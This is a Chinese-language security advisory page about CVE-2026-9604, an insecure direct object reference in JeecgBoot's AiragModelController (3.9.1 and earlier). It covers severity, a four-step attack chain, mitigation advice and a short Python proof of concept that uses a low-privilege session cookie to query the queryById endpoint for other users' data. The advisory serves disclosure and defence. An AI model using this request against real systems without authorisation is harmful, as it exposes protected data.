IPBUF安全漏洞报告
English
CVE-2026-9604 CVSS 4.3 中危

CVE-2026-9604 JeecgBoot权限绕过漏洞

披露日期: 2026-05-26

漏洞信息

漏洞编号
CVE-2026-9604
漏洞类型
权限绕过
CVSS评分
4.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
JeecgBoot

相关标签

权限绕过JeecgBoot访问控制信息泄露CVE-2026-9604

漏洞概述

JeecgBoot 3.9.1及之前版本中的AiragModelController组件存在访问控制缺陷。由于未正确校验用户权限,攻击者可操纵list/queryById参数,在仅需低权限的情况下远程获取敏感信息。目前该漏洞利用代码已公开,风险较高,建议尽快升级。

技术细节

该漏洞源于JeecgBoot框架AiragModelController组件中存在不安全的直接对象引用(IDOR)。系统在处理模型列表查询(list)和详情查询(queryById)时,未对当前请求者的权限进行严格校验,导致访问控制机制失效。攻击者可通过构造特制的HTTP请求,传入特定的参数值,从而绕过身份验证逻辑,直接访问本应受保护的资源。由于CVSS向量显示攻击复杂度低且无需用户交互,攻击者可利用该漏洞批量遍历敏感数据,造成信息泄露。

攻击链分析

STEP 1
侦察
攻击者识别目标系统为JeecgBoot,并确认版本在3.9.1及以下。
STEP 2
获取低权限账号
攻击者注册或获取一个普通用户账号(满足PR:L要求)。
STEP 3
构造恶意请求
攻击者使用该账号登录,获取会话Cookie,并向AiragModelController发送包含特定参数的请求。
STEP 4
权限绕过与数据窃取
服务器因校验缺失返回了本该受限的数据,攻击者成功获取敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests def exploit(target_url, cookie): """ PoC for CVE-2026-9604 Exploits improper access control in AiragModelController """ headers = { "Cookie": cookie, "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" } # Targeting the vulnerable endpoint queryById # Attacker tries to access arbitrary model data url = f"{target_url}/jeecgboot/airagModel/queryById" params = {"id": "1"} # Manipulating the argument try: response = requests.get(url, headers=headers, params=params, timeout=5) if response.status_code == 200: print("[+] Request successful. Check if sensitive data is returned:") print(response.text) else: print(f"[-] Failed with status code: {response.status_code}") except Exception as e: print(f"[!] Error: {e}") # Usage example: # exploit("http://127.0.0.1:8080", "JSESSIONID=...")

影响范围

JeecgBoot <= 3.9.1

防御指南

临时缓解措施
在未完成升级前,建议通过安全设备(如WAF)添加规则,拦截对AiragModelController组件中list和queryById接口的异常调用,或暂时禁用该组件功能以降低风险。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表